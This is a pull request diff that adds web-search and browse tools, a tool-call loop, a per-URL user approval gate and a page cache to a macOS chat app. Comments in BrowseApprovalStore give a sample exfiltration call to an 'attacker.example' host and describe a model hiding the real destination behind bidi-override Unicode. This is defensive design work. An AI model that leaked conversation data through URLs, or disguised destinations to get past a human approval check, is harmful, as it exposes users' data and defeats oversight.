### PR TITLE
feat(rapid-mac): add built-in web tools

### DIFF
--- a/apps/rapid-mac/Sources/Rapid/Chat/ChatViewModel.swift
+++ b/apps/rapid-mac/Sources/Rapid/Chat/ChatViewModel.swift
@@ -46,6 +46,31 @@ final class ChatViewModel {
     /// inject a real URLSession or thread a mock through both layers.
     private var client: ChatStreamClient
 
+    /// Tool runner. An ``EmptyToolRegistry`` short-circuits the tool-call
+    /// request shape (we send no ``tools:`` field and the server emits plain
+    /// content), which is what unit tests and the no-tools build get.
+    let tools: any ToolRegistry
+
+    /// Hard cap on tool-call rounds within a single user turn — stops a
+    /// runaway model that just keeps asking for the same tool.
+    private let maxToolRounds: Int = 10
+
+    /// Per-tool on/off flags, persisted in ``UserDefaults`` under keys of the
+    /// form ``rapid.tools.enabled.<name>``. Reads fall through to ``true``
+    /// (every tool is enabled by default) so a fresh install picks up tools we
+    /// ship without the user opting in. ``enabledDefinitions`` filters disabled
+    /// tools out before they reach the model, and the loop also gates dispatch
+    /// so a model that invents a disabled name gets a clean refusal instead.
+    private(set) var disabledTools: Set<String>
+
+    /// ``UserDefaults`` suite the tool flags live in. Injectable so tests can
+    /// use a fresh in-memory suite per case.
+    private let toolDefaults: UserDefaults
+
+    private static func toolEnabledKey(_ name: String) -> String {
+        "rapid.tools.enabled.\(name)"
+    }
+
     /// Set while a stream is in flight. UI reads this to show the stop
     /// button instead of send.
     private(set) var isStreaming: Bool = false {
@@ -85,13 +110,47 @@ final class ChatViewModel {
 
     init(
         client: ChatStreamClient = ChatStreamClient(),
+        tools: any ToolRegistry = EmptyToolRegistry(),
+        toolDefaults: UserDefaults = .standard,
         sampling: SamplingConfig? = nil,
         server: ServerManager? = nil
     ) {
         self.client = client
+        self.tools = tools
+        self.toolDefaults = toolDefaults
         self.sampling = sampling
         self.server = server
+        // Seed disabledTools from the persistent store. Anything explicitly set
+        // to ``false`` in UserDefaults goes in; unknown keys default to enabled.
+        var disabled = Set<String>()
+        for def in tools.definitions {
+            // ``object(forKey:)`` so we can distinguish "absent" (default to
+            // enabled) from "explicitly false".
+            if let raw = toolDefaults.object(forKey: Self.toolEnabledKey(def.function.name)) as? Bool,
+               raw == false {
+                disabled.insert(def.function.name)
+            }
+        }
+        self.disabledTools = disabled
         self.conversations = ConversationStore.load()
+    }
+
+    /// Toggle a tool from the UI. Persists to ``UserDefaults`` so the choice
+    /// survives an app restart.
+    func setToolEnabled(_ name: String, _ enabled: Bool) {
+        toolDefaults.set(enabled, forKey: Self.toolEnabledKey(name))
+        if enabled {
+            disabledTools.remove(name)
+        } else {
+            disabledTools.insert(name)
+        }
+    }
+
+    /// Active tool definitions — the registry minus anything the user has
+    /// toggled off. Computed every send so a mid-session toggle takes effect on
+    /// the next turn without re-initialising the chat loop.
+    var enabledDefinitions: [ToolDefinition] {
+        tools.definitions.filter { !disabledTools.contains($0.function.name) }
     }
 
     // MARK: - Conversation history (M3)
@@ -305,9 +364,9 @@ final class ChatViewModel {
                 client.baseURL = ChatStreamClient.loopbackURL(port: server.activePort)
             }
 
-            await self.runSingleStream(
+            await self.runToolLoop(
                 alias: alias,
-                placeholderIndex: placeholderIndex,
+                initialPlaceholder: placeholderIndex,
                 epoch: epoch
             )
         }
@@ -827,18 +886,25 @@ final class ChatViewModel {
         regenerateLast(alias: trimmed)
     }
 
-    // MARK: - Single-stream driver
+    // MARK: - Tool round-trip loop
 
-    /// Stream one assistant turn into the placeholder at
-    /// ``placeholderIndex``. The minimal menu-bar app is a plain
-    /// streaming chat — no tools, no tool-call round-trip — so a single
-    /// stream is the whole turn. The KEEP-path wire hygiene is preserved:
-    /// empty-prose and forward-incompatible ``.unknown`` rows are stripped
-    /// from the wire body, and the transcript is silently context-window
-    /// trimmed (ChatGPT / Claude desktop behaviour).
-    private func runSingleStream(
+    /// Drive one user turn to completion.
+    ///
+    /// Each iteration streams one assistant turn into the placeholder at
+    /// ``currentPlaceholder``. When the model finishes with
+    /// ``finish_reason: "tool_calls"`` we run the referenced tools, append the
+    /// results as ``role: "tool"`` rows, open a fresh assistant placeholder,
+    /// and loop. Any other finish reason (or a transport failure, or Stop)
+    /// ends the turn. Bounded by ``maxToolRounds`` so a misbehaving model
+    /// can't pin the loop forever.
+    ///
+    /// The KEEP-path wire hygiene is preserved on every round: empty-prose
+    /// and forward-incompatible ``.unknown`` rows are stripped from the wire
+    /// body, and the transcript is silently context-window trimmed (ChatGPT /
+    /// Claude desktop behaviour).
+    private func runToolLoop(
         alias: String,
-        placeholderIndex: Int,
+        initialPlaceholder: Int,
         epoch: Int
     ) async {
         defer {
@@ -850,64 +916,271 @@ final class ChatViewModel {
                 inflight = nil
             }
         }
-        // History for this request: everything BEFORE the streaming
-        // placeholder. The placeholder itself is excluded because the
-        // assistant hasn't said anything yet.
-        var history = Array(messages.prefix(placeholderIndex))
-        // v0.4.35: strip empty-prose assistant turns from the wire body.
-        // The UI still shows them — this is wire-only — but sending
-        // ``{"role":"assistant","content":""}`` into a chat template is a
-        // documented foot-gun (several templates treat an empty assistant
-        // slot as "the model already finished" and immediately EOS).
-        history = ChatViewModel.filterEmptyAssistantsForWire(history)
-        // Issue #477: drop any forward-incompatible ``.unknown``-role rows
-        // so a serialised ``{"role":"unknown"}`` never 400s the send.
-        history = ChatViewModel.filterUnknownRolesForWire(history)
-        // v0.5.1: outgoing ``model:`` is the alias the server is ACTUALLY
-        // serving right now, falling back to the caller-supplied alias
-        // until the server reports ``.ready``.
-        let wireAlias = server?.servingAlias ?? alias
-        // v0.5.11 / issue #363: silent context-window trim against the
-        // engine-reported window (captured on the last profile fetch),
-        // falling back to the per-family heuristic in ``ModelInfoCatalog``.
-        let ctxWindow = ModelInfoCatalog
-            .info(
-                for: wireAlias,
-                hfRepo: nil,
-                serverContextWindow: sampling?.activeContextWindow
+        var currentPlaceholder = initialPlaceholder
+        var roundsLeft = maxToolRounds
+        while roundsLeft > 0 {
+            roundsLeft -= 1
+            // History for this request: everything BEFORE the streaming
+            // placeholder. The placeholder itself is excluded because the
+            // assistant hasn't said anything yet.
+            var history = Array(messages.prefix(currentPlaceholder))
+            // v0.4.35: strip empty-prose assistant turns from the wire body.
+            // The UI still shows them — this is wire-only — but sending
+            // ``{"role":"assistant","content":""}`` into a chat template is a
+            // documented foot-gun (several templates treat an empty assistant
+            // slot as "the model already finished" and immediately EOS).
+            // Tool-call assistants (empty prose but ``tool_calls`` populated)
+            // stay — they're load-bearing for the tool loop.
+            history = ChatViewModel.filterEmptyAssistantsForWire(history)
+            // Issue #477: drop any forward-incompatible ``.unknown``-role rows
+            // so a serialised ``{"role":"unknown"}`` never 400s the send.
+            history = ChatViewModel.filterUnknownRolesForWire(history)
+            // v0.5.1: outgoing ``model:`` is the alias the server is ACTUALLY
+            // serving right now, falling back to the caller-supplied alias
+            // until the server reports ``.ready``. Resolved BEFORE the tool
+            // definitions so the broken-tool-caller strip runs against the
+            // model that will actually answer this round.
+            let wireAlias = server?.servingAlias ?? alias
+            let definitions = ChatViewModel.wireDefinitions(
+                forAlias: wireAlias,
+                enabled: enabledDefinitions
             )
-            .contextWindow
-        history = ChatViewModel.trimMessagesForContextWindow(
-            history,
-            contextWindow: ctxWindow
-        )
-        let request: ChatStreamClient.Request
-        if let s = sampling {
-            let resolved = s.resolved(toolsEnabled: false)
-            request = ChatStreamClient.Request(
-                alias: wireAlias,
-                messages: history,
-                temperature: resolved.temperature,
-                topP: resolved.topP,
-                maxTokens: resolved.maxTokens,
-                repetitionPenalty: resolved.repetitionPenalty,
-                enableThinking: resolved.enableThinking
+            let allowedToolNames = Set(definitions.map { $0.function.name })
+            let roundDisabledTools = Set(tools.definitions.map { $0.function.name })
+                .subtracting(allowedToolNames)
+            // Ambient anti-confabulation guidance, prepended for the wire body
+            // only (never appended to the transcript) so the user's history
+            // stays prose-only. Skipped when the transcript already opens with
+            // a system row, and when no tools are advertised.
+            history.insert(
+                contentsOf: ChatViewModel.ambientSystemMessages(
+                    historyOpensWithSystem: history.first?.role == .system,
+                    toolsAdvertised: !definitions.isEmpty
+                ),
+                at: 0
             )
-        } else {
-            request = ChatStreamClient.Request(
-                alias: wireAlias,
-                messages: history,
-                enableThinking: false
+            // v0.5.11 / issue #363: silent context-window trim against the
+            // engine-reported window (captured on the last profile fetch),
+            // falling back to the per-family heuristic in ``ModelInfoCatalog``.
+            let ctxWindow = ModelInfoCatalog
+                .info(
+                    for: wireAlias,
+                    hfRepo: nil,
+                    serverContextWindow: sampling?.activeContextWindow
+                )
+                .contextWindow
+            history = ChatViewModel.trimMessagesForContextWindow(
+                history,
+                contextWindow: ctxWindow
             )
+            let request: ChatStreamClient.Request
+            if let s = sampling {
+                let resolved = s.resolved(toolsEnabled: !definitions.isEmpty)
+                request = ChatStreamClient.Request(
+                    alias: wireAlias,
+                    messages: history,
+                    temperature: resolved.temperature,
+                    topP: resolved.topP,
+                    maxTokens: resolved.maxTokens,
+                    repetitionPenalty: resolved.repetitionPenalty,
+                    tools: definitions.isEmpty ? nil : definitions,
+                    enableThinking: resolved.enableThinking
+                )
+            } else {
+                request = ChatStreamClient.Request(
+                    alias: wireAlias,
+                    messages: history,
+                    tools: definitions.isEmpty ? nil : definitions,
+                    enableThinking: false
+                )
+            }
+            let outcome = await runOneStream(
+                placeholderIndex: currentPlaceholder,
+                request: request,
+                epoch: epoch
+            )
+            switch outcome {
+            case .terminal:
+                return
+            case .toolCallsPending(let calls):
+                // The user can press Stop in the gap between the stream
+                // returning .toolCallsPending and the loop below dispatching
+                // the first tool. Honour cancellation here, and after each
+                // tool, clearing the staged tool_calls on the assistant row so
+                // the next wire body doesn't ship a half-finished tool round
+                // with no matching results (most chat templates 400 on that).
+                if Task.isCancelled {
+                    finaliseCancelledPlaceholder(at: currentPlaceholder, epoch: epoch)
+                    return
+                }
+                // On the last allowed round, executing the requested tools is
+                // wasted work — there is no follow-up round left to consume
+                // the results. Bail before the side-effects fire.
+                if roundsLeft == 0 {
+                    failWithToolRoundCap(at: currentPlaceholder, epoch: epoch)
+                    return
+                }
+                // Run each tool sequentially. Parallel execution via TaskGroup
+                // trips Swift 6's region-based isolation analyzer on
+                // @MainActor protocols; the tools here are network calls the
+                // model rarely emits more than two of at once.
+                var results: [ToolCallResult] = []
+                for call in calls {
+                    if Task.isCancelled {
+                        finaliseCancelledPlaceholder(at: currentPlaceholder, epoch: epoch)
+                        return
+                    }
+                    // Refuse rather than dispatch when the tool was not
+                    // advertised this round — a malformed model can emit a
+                    // tool_call for a tool we never offered, and ``tools.run``
+                    // would happily execute it. The refusal goes back as an
+                    // error result so the model can recover in prose.
+                    if let refusal = ChatViewModel.toolRefusalMessage(
+                        name: call.function.name,
+                        disabledTools: roundDisabledTools
+                    ) {
+                        results.append(ToolCallResult(
+                            toolCallID: call.id,
+                            content: refusal,
+                            isError: true,
+                            failureKind: .toolFailed
+                        ))
+                        continue
+                    }
+                    let r = await tools.run(call)
+                    results.append(r)
+                    // A Stop pressed AFTER the tool resolved but BEFORE we
+                    // append the result rows must still win. Exit BEFORE the
+                    // append so the placeholder gets the standard cancel
+                    // finalisation instead of a dangling tool_calls row.
+                    if Task.isCancelled {
+                        finaliseCancelledPlaceholder(at: currentPlaceholder, epoch: epoch)
+                        return
+                    }
+                }
+                guard epoch == conversationEpoch else { return }
+                // Append role:"tool" messages for each result.
+                for r in results {
+                    let failureKind = r.failureKind ?? FailureDiagnoser.toolFailureKind(
+                        toolName: calls.first(where: { $0.id == r.toolCallID })?.function.name ?? "",
+                        content: r.content,
+                        isError: r.isError
+                    )
+                    let msg = ChatMessage(
+                        role: .tool,
+                        content: r.content,
+                        status: (r.isError || failureKind != nil) ? .failed : .complete,
+                        errorMessage: failureKind.map { FailureDiagnoser.diagnosis(for: $0).message },
+                        failureKind: failureKind,
+                        toolCallID: r.toolCallID
+                    )
+                    _ = appendMessage(msg)
+                }
+                // Open the next assistant placeholder and loop.
+                currentPlaceholder = appendMessage(ChatMessage(role: .assistant, status: .streaming))
+            }
         }
-        _ = await runOneStream(
-            placeholderIndex: placeholderIndex,
-            request: request,
-            epoch: epoch
-        )
     }
 
-    // MARK: - Legacy tool round-trip loop (removed)
+    /// Finalise the streaming placeholder through the shared cancel contract.
+    /// Used by the tool loop's several cancellation checkpoints.
+    private func finaliseCancelledPlaceholder(at index: Int, epoch: Int) {
+        guard epoch == conversationEpoch else { return }
+        guard var stale = currentMessage(index: index) else { return }
+        ChatViewModel.finaliseCancellation(message: &stale)
+        updateMessage(at: index, with: stale)
+    }
+
+    /// The model kept asking for tools until ``maxToolRounds`` ran out. Surface
+    /// it as a failed row + banner rather than leaving the user staring at a
+    /// half-finished transcript.
+    private func failWithToolRoundCap(at index: Int, epoch: Int) {
+        guard epoch == conversationEpoch else { return }
+        let message = ChatViewModel.toolRoundCapMessage(cap: maxToolRounds)
+        if var capped = currentMessage(index: index) {
+            capped.status = .failed
+            capped.failureKind = .toolFailed
+            capped.errorMessage = message
+            capped.toolCalls = nil
+            updateMessage(at: index, with: capped)
+        }
+        lastFailureKind = .toolFailed
+        lastError = message
+    }
+
+    /// Copy for the round-cap failure. Static so a test can pin it without
+    /// driving a full loop.
+    static func toolRoundCapMessage(cap: Int) -> String {
+        "The model kept calling tools without answering (\(cap) rounds). Try rephrasing, or turn a tool off."
+    }
+
+    /// Wire-side filter — what actually ends up in the request body's ``tools``
+    /// array. When ``alias`` is marked broken in ``ToolUseCapability``, returns
+    /// ``[]`` so the model never sees tools it has been empirically proven to
+    /// silently ignore or schema-leak. Static + pure so the strip can be
+    /// pinned without spinning up a ``ChatViewModel``.
+    nonisolated static func wireDefinitions(
+        forAlias alias: String,
+        enabled: [ToolDefinition]
+    ) -> [ToolDefinition] {
+        if ToolUseCapability.shouldDisableToolsChip(alias: alias) {
+            return []
+        }
+        return enabled
+    }
+
+    /// Decide whether a model-emitted tool call should be REFUSED (never
+    /// dispatched to ``tools.run``) rather than executed, and with what
+    /// model-facing explainer. Returns nil when the call is allowed to run.
+    ///
+    /// Omitting a tool from the request body does NOT stop a malformed model
+    /// emitting a call for it, so this is the load-bearing gate — not the
+    /// wire filter. Refusing (rather than hard-discarding) lets the model
+    /// answer in prose on the next round; the round cap backstops a model that
+    /// keeps trying.
+    nonisolated static func toolRefusalMessage(
+        name: String,
+        disabledTools: Set<String>
+    ) -> String? {
+        guard disabledTools.contains(name) else { return nil }
+        return "tool '\(name)' isn't available in this conversation — answer directly, or ask the user to enable it in Settings."
+    }
+
+    /// Ambient anti-confabulation guidance — prepended to the wire body
+    /// whenever at least one tool is advertised.
+    ///
+    /// Small models routinely fire a tool, get faithful snippets back, then
+    /// fabricate the rest of the list from training-data priors. The preamble
+    /// is the cheapest mitigation and costs nothing when no tool is offered.
+    /// Returns an empty array when the transcript already opens with a
+    /// ``role: "system"`` row so we never ship competing system messages.
+    static func ambientSystemMessages(
+        historyOpensWithSystem: Bool,
+        toolsAdvertised: Bool
+    ) -> [ChatMessage] {
+        guard !historyOpensWithSystem, toolsAdvertised else { return [] }
+        return [ChatMessage(role: .system, content: toolGuidancePreamble, status: .complete)]
+    }
+
+    static let toolGuidancePreamble: String = """
+You have access to tools that fetch real-time information. When you use one of these tools, follow these rules — they OVERRIDE your training data:
+
+1. Your ONLY source of truth for this turn is the tool result text. If a fact is not in the tool result, you DO NOT KNOW IT for the purposes of this answer. Your training data on this topic is OUT OF DATE and MUST NOT be used.
+
+2. NEVER enumerate a list (teams, products, countries, dates, scores, names) from memory. If the user asks for a list and the tool result does NOT name the specific items, say so plainly. Do not produce any items from training data.
+
+3. Forbidden phrases — they always signal you are reaching past the snippet: "based on common knowledge", "as is widely reported", "the following are typically considered", "generally speaking".
+
+4. If only one or two items appear in the tool result, list ONLY those — do not extrapolate the rest of the bracket / list / table. State explicitly that this is partial coverage.
+
+5. When the user's question is ambiguous about which subject the tool result covers, ask a clarifying question before answering.
+
+6. If you find yourself wanting to write a long enumerated list, STOP. The tool result likely doesn't contain that list. Issue another tool call with a more specific query instead.
+
+These rules apply to every tool, not just web search.
+"""
+
+    // MARK: - Single-stream driver
 
     /// Outcome of one streamed assistant turn.
     private enum StreamOutcome {

--- a/apps/rapid-mac/Sources/Rapid/RapidApp.swift
+++ b/apps/rapid-mac/Sources/Rapid/RapidApp.swift
@@ -51,6 +51,11 @@ struct RapidApp: App {
     @State private var dockPromptStore: DockVisibilityPromptStore
     /// View → Keep Window on Top toggle (session state, not persisted).
     @State private var keepWindowOnTop: Bool = false
+    /// Web-search backend + API key, shared by the tool runner and Settings.
+    @State private var webSearch: WebSearchConfig
+    /// Per-fetch approval gate for the ``browse`` tool, shared by the tool
+    /// runner (which suspends on it) and the SwiftUI approval sheet.
+    @State private var browseApproval: BrowseApprovalStore
 
     /// AppKit delegate — installs the menu-bar tray + tears down the
     /// subprocess before the process image dies.
@@ -96,7 +101,18 @@ struct RapidApp: App {
         // Apply the persisted theme override before the first window
         // renders so the user doesn't see a flash of the wrong mode.
         appearanceConfig.apply()
-        let chat = ChatViewModel(sampling: samplingConfig, server: manager)
+        // Built-in tools. The registry owns the two stores the tools consult
+        // at dispatch time, and the app re-publishes them into the environment
+        // so Settings + the approval sheet bind to the same instances.
+        let webSearchConfig = WebSearchConfig()
+        let browseApprovalStore = BrowseApprovalStore()
+        let toolRegistry = BuiltinToolRegistry(
+            browseApproval: browseApprovalStore,
+            webSearch: webSearchConfig
+        )
+        _webSearch = State(initialValue: webSearchConfig)
+        _browseApproval = State(initialValue: browseApprovalStore)
+        let chat = ChatViewModel(tools: toolRegistry, sampling: samplingConfig, server: manager)
         let updateChecker = UpdateChecker()
         let installerInstance = Installer()
         let downloadsInstance = DownloadManager(binaryPath: manager.binaryPath)
@@ -144,6 +160,8 @@ struct RapidApp: App {
                 .environment(installTracker)
                 .environment(quickstart)
                 .environment(dockPromptStore)
+                .environment(webSearch)
+                .environment(browseApproval)
                 .task {
                     // DEV-ONLY: render real screens to PNG when
                     // RAPID_DEV_SNAPSHOT_DIR is set, then quit. Inert
@@ -252,6 +270,8 @@ struct RapidApp: App {
                 .environment(updater)
                 .environment(installer)
                 .environment(dockPromptStore)
+                .environment(webSearch)
+                .environment(browseApproval)
         }
         .windowResizability(.contentMinSize)
         .defaultSize(width: 900, height: 720)

--- a/apps/rapid-mac/Sources/Rapid/Tools/BrowseApprovalStore.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/BrowseApprovalStore.swift
@@ -1,0 +1,152 @@
+import Foundation
+import Observation
+
+/// Per-invocation approval gate for the ``browse`` action tool.
+///
+/// A URL fetch is not harmless: the model chooses the URL, so a plain
+/// `browse("https://attacker.example/?leak=<secrets>")` would exfiltrate
+/// conversation data to a public host that no SSRF check can block (the host
+/// *is* public). The only real defence is that the user SEES and approves the
+/// exact URL before any request runs. Mirrors ChatGPT's "Allow once / Don't
+/// allow": there is no per-URL "always allow" (URLs vary every call); a
+/// prominent Settings switch (**Auto-approve all browsing**) turns the gate off
+/// for unattended use. Default is ``Mode/ask``; only that coarse mode is
+/// persisted.
+@MainActor
+@Observable
+final class BrowseApprovalStore {
+    enum Mode: String {
+        case ask
+        case autoApproveAll
+    }
+
+    enum Decision: Equatable {
+        case allowOnce
+        case deny
+    }
+
+    /// A pending prompt the UI surfaces as a confirm dialog.
+    struct PendingApproval: Equatable {
+        /// Single-lined, length-capped preview of the URL.
+        let url: String
+        /// The COMPLETE, untruncated URL. The sheet renders this (display-safe)
+        /// so a model can't hide the real destination past a preview cap.
+        let fullURL: String
+        /// The host, surfaced prominently so the user judges *where* the request
+        /// goes without parsing a long query string.
+        let host: String
+    }
+
+    static let modeKey = "rapid.tools.browse.mode.v1"
+
+    private let defaults: UserDefaults
+
+    var mode: Mode {
+        didSet {
+            guard mode != oldValue else { return }
+            defaults.set(mode.rawValue, forKey: Self.modeKey)
+        }
+    }
+
+    private(set) var pendingRequest: PendingApproval?
+    private var pendingContinuation: CheckedContinuation<Decision, Never>?
+
+    init(defaults: UserDefaults = .standard) {
+        self.defaults = defaults
+        self.mode = Mode(rawValue: defaults.string(forKey: Self.modeKey) ?? "") ?? .ask
+    }
+
+    /// Gate a URL fetch. Returns immediately when auto-approve is on; otherwise
+    /// suspends until the UI answers.
+    func requestApproval(url: String, host: String) async -> Decision {
+        if mode == .autoApproveAll { return .allowOnce }
+        // Re-entrancy guard — tool execution is serial, so a second pending
+        // request means something is wrong; deny rather than hang.
+        if pendingRequest != nil { return .deny }
+        return await withTaskCancellationHandler {
+            await withCheckedContinuation { (continuation: CheckedContinuation<Decision, Never>) in
+                // Cancellation can land between the re-entrancy check above and
+                // here; the onCancel handler would then have found no
+                // continuation to resume. Re-check inside the body so we deny
+                // immediately instead of installing a pending request that would
+                // surface an orphaned, never-answerable sheet.
+                if Task.isCancelled {
+                    continuation.resume(returning: .deny)
+                    return
+                }
+                self.pendingContinuation = continuation
+                self.pendingRequest = PendingApproval(
+                    url: Self.previewLine(url),
+                    fullURL: url,
+                    host: host
+                )
+            }
+        } onCancel: { [weak self] in
+            Task { @MainActor [weak self] in
+                guard let self else { return }
+                if let cont = self.pendingContinuation {
+                    self.pendingContinuation = nil
+                    self.pendingRequest = nil
+                    cont.resume(returning: .deny)
+                }
+            }
+        }
+    }
+
+    /// Called by the SwiftUI dialog with the user's choice; resumes the tool.
+    func answer(_ decision: Decision) {
+        guard pendingRequest != nil else { return }
+        pendingRequest = nil
+        pendingContinuation?.resume(returning: decision)
+        pendingContinuation = nil
+    }
+
+    /// Collapse a URL to a single capped line for the dialog body. Explicit
+    /// char loop (no closure over the collection — the
+    /// SIGTRAP-in-optimized-swift-test class) collecting up to `cap` visible
+    /// chars; interior newlines/tabs flatten to spaces.
+    static func previewLine(_ raw: String, cap: Int = 300) -> String {
+        var out = ""
+        out.reserveCapacity(cap + 1)
+        var started = false
+        var truncated = false
+        for ch in raw {
+            let isWhitespace = ch == " " || ch == "\n" || ch == "\r" || ch == "\t"
+            if !started {
+                if isWhitespace { continue }
+                started = true
+            }
+            if out.count >= cap { truncated = true; break }
+            out.append(isWhitespace ? " " : ch)
+        }
+        while out.last == " " { out.removeLast() }
+        return truncated ? out + "…" : out
+    }
+
+    /// Make a string SAFE to show in the approval sheet. A model can hide the
+    /// real destination behind invisible Unicode — bidi overrides (U+202E …)
+    /// can visually reorder text so `evil.example` renders as if it were a
+    /// trusted host, and other format / control scalars are zero-width. The
+    /// fetch uses the raw bytes; the user must see them too. Every control /
+    /// format / line-separator scalar (except the legitimately-visible tab and
+    /// newline) is rendered as a `\u{XXXX}` escape so nothing can reorder or
+    /// hide.
+    static func displaySafe(_ raw: String) -> String {
+        var out = ""
+        out.reserveCapacity(raw.count + 8)
+        for scalar in raw.unicodeScalars {
+            if scalar == "\n" || scalar == "\t" {
+                out.unicodeScalars.append(scalar)
+                continue
+            }
+            switch scalar.properties.generalCategory {
+            case .control, .format, .lineSeparator, .paragraphSeparator,
+                 .privateUse, .surrogate, .unassigned:
+                out += String(format: "\\u{%04X}", scalar.value)
+            default:
+                out.unicodeScalars.append(scalar)
+            }
+        }
+        return out
+    }
+}

--- a/apps/rapid-mac/Sources/Rapid/Tools/BrowseContentCache.swift
+++ b/apps/rapid-mac/Sources/Rapid/Tools/BrowseContentCache.swift
@@ -1,0 +1,416 @@
+import Foundation
+import CryptoKit
+
+/// Store of fetched-and-rendered page bodies so the ``browse`` tool can page
+/// through a long document (`offset` param) WITHOUT re-fetching — and so a model
+/// that asks for page 2 gets the same bytes it saw on page 1.
+///
+/// Two tiers:
+///   * **Memory (hot)** — bounded on entry count and total bytes (LRU eviction)
+///     so a session that browses many large pages can't grow the app's memory
+///     without limit.
+///   * **Disk (persistent)** — every ``put`` also writes the rendered page to
+///     ``~/Library/Application Support/Rapid/browse-cache/<sha256(key)>.json``,
+///     and a memory miss falls back to disk. This makes a re-read of a URL from
+///     a PREVIOUS launch a zero-network cache hit while the entry is fresh — the
+///     "runs on your Mac" spine the built-in-tools direction asks for. Disk is
+///     independently bounded (entry count + total bytes) by an LRU sweep keyed
+///     on file modification time, so the folder can't grow unbounded either.
+///
+/// Keyed by the exact URL string the model passed (that is what it re-sends for
+/// paging), lightly normalised. Thread-safe via a lock — the tool runs on the
+/// main actor today, but the cache makes no actor assumptions so it stays
+/// correct if a future fetch path moves off it.
+final class BrowseContentCache: @unchecked Sendable {
+    struct Entry: Codable, Sendable {
+        let title: String?
+        /// Full rendered Markdown; `browse` returns `offset..<offset+budget`
+        /// slices of this.
+        let markdown: String
+        /// Final URL after redirects (informational; the key is the requested URL).
+        let finalURL: String
+        /// Wall-clock time when the network response was fetched. Persisting
+        /// this separately from file mtime lets disk LRU touches preserve the
+        /// original freshness deadline.
+        let fetchedAt: Date
+
+        init(title: String?, markdown: String, finalURL: String, fetchedAt: Date = Date()) {
+            self.title = title
+            self.markdown = markdown
+            self.finalURL = finalURL
+            self.fetchedAt = fetchedAt
+        }
+
+        private enum CodingKeys: String, CodingKey {
+            case title, markdown, finalURL, fetchedAt
+        }
+
+        init(from decoder: Decoder) throws {
+            let container = try decoder.container(keyedBy: CodingKeys.self)
+            title = try container.decodeIfPresent(String.self, forKey: .title)
+            markdown = try container.decode(String.self, forKey: .markdown)
+            finalURL = try container.decode(String.self, forKey: .finalURL)
+            // Entries written before TTL support have no trustworthy fetch
+            // time. Treat them as expired instead of silently serving an
+            // arbitrarily old page after upgrade.
+            fetchedAt = try container.decodeIfPresent(Date.self, forKey: .fetchedAt) ?? .distantPast
+        }
+    }
+
+    static let defaultTTL: TimeInterval = 15 * 60
+    static let shared = BrowseContentCache()
+
+    private let memoryLock = NSLock()
+    private let diskLock = NSLock()
+    private var store: [String: Entry] = [:]
+    private var order: [String] = []          // LRU: front = oldest
+    private var totalBytes = 0
+    private var nextDiskWriteID: UInt64 = 0
+    private var pendingDiskWrites: [String: UInt64] = [:]
+
+    private let maxEntries: Int
+    private let maxBytes: Int
+    private let ttl: TimeInterval
+
+    /// Directory backing the persistent tier, or nil to run memory-only (the
+    /// legacy behaviour — used by unit tests that don't want to touch disk).
+    private let diskDirectory: URL?
+    /// Disk-tier caps. Larger than the memory caps: disk is cheap and the whole
+    /// point is surviving across launches, so we keep more history on disk than
+    /// we hold hot in memory.
+    private let maxDiskEntries: Int
+    private let maxDiskBytes: Int
+
+    /// Production initialiser — persists fresh entries for 15 minutes to
+    /// ``Application Support/Rapid/browse-cache``. The default ``shared``
+    /// instance uses this shape so real browsing survives a relaunch.
+    init(
+        maxEntries: Int = 16,
+        maxBytes: Int = 8 * 1024 * 1024,
+        ttl: TimeInterval = BrowseContentCache.defaultTTL
+    ) {
+        self.maxEntries = maxEntries
+        self.maxBytes = maxBytes
+        self.ttl = ttl
+        self.diskDirectory = Self.defaultDiskDirectory()
+        self.maxDiskEntries = 128
+        self.maxDiskBytes = 64 * 1024 * 1024
+        sweepDiskOnInitialization()
+    }
+
+    /// Test / custom initialiser. Pass ``diskDirectory: nil`` for a memory-only
+    /// cache (the pre-persistence behaviour), or a per-test temp directory to
+    /// exercise the disk tier without touching the user's real Application
+    /// Support tree.
+    init(
+        maxEntries: Int = 16,
+        maxBytes: Int = 8 * 1024 * 1024,
+        diskDirectory: URL?,
+        maxDiskEntries: Int = 128,
+        maxDiskBytes: Int = 64 * 1024 * 1024,
+        ttl: TimeInterval = BrowseContentCache.defaultTTL
+    ) {
+        self.maxEntries = maxEntries
+        self.maxBytes = maxBytes
+        self.ttl = ttl
+        self.diskDirectory = diskDirectory
+        self.maxDiskEntries = maxDiskEntries
+        self.maxDiskBytes = maxDiskBytes
+        sweepDiskOnInitialization()
+    }
+
+    /// ``Application Support/Rapid/browse-cache`` — honours the ``$HOME``
+    /// override the same way every other on-disk store in the app does
+    /// (#419/#420), so a dogfood instance with an overridden HOME reads/writes
+    /// its own cache rather than the real user's.
+    private static func defaultDiskDirectory() -> URL {
+        ApplicationSupportLocator.applicationSupportRoot()
+            .appendingPathComponent("browse-cache", isDirectory: true)
+    }
+
+    /// File name a cache key maps to on disk: ``<sha256(key)>.json``. The URL
+    /// key can contain slashes, query strings, and arbitrary bytes, so it can't
+    /// be a filename directly — hashing gives a fixed-length, filesystem-safe,
+    /// collision-resistant name.
+    private static func diskFileName(for key: String) -> String {
+        let digest = SHA256.hash(data: Data(key.utf8))
+        let hex = digest.map { String(format: "%02x", $0) }.joined()
+        return "\(hex).json"
+    }
+
+    /// Normalise a model-supplied URL to a stable cache key: trim, and lowercase
+    /// only the scheme + host (never the path/query — those are case-sensitive).
+    static func key(for rawURL: String) -> String {
+        let trimmed = rawURL.trimmingCharacters(in: .whitespacesAndNewlines)
+        guard let comps = URLComponents(string: trimmed),
+              let scheme = comps.scheme, let host = comps.host else {
+            return trimmed
+        }
+        var c = comps
+        c.scheme = scheme.lowercased()
+        c.host = host.lowercased()
+        return c.string ?? trimmed
+    }
+
+    func get(_ rawURL: String) -> Entry? {
+        let k = Self.key(for: rawURL)
+        memoryLock.lock()
+        if let e = store[k] {
+            if isFresh(e) {
+                touch(k)
+                memoryLock.unlock()
+                return e
+            }
+            removeLocked(k)
+        }
+        memoryLock.unlock()
+
+        // Memory miss: fall back to the persistent tier. A hit here is a page
+        // fetched on a PREVIOUS launch (or evicted from the hot tier) — reading
+        // it costs zero network. Promote it back into memory so subsequent
+        // paging calls stay hot. Disk I/O deliberately happens without the
+        // memory lock so a slow miss cannot block unrelated hot entries.
+        guard let e = loadFromDisk(k) else { return nil }
+
+        memoryLock.lock(); defer { memoryLock.unlock() }
+        // A concurrent put may have installed a newer value while the disk read
+        // was in flight. Keep and return that value rather than replacing it
+        // with the older persisted copy.
+        if let current = store[k] {
+            touch(k)
+            return current
+        }
+        insertLocked(k, entry: e)
+        return e
+    }
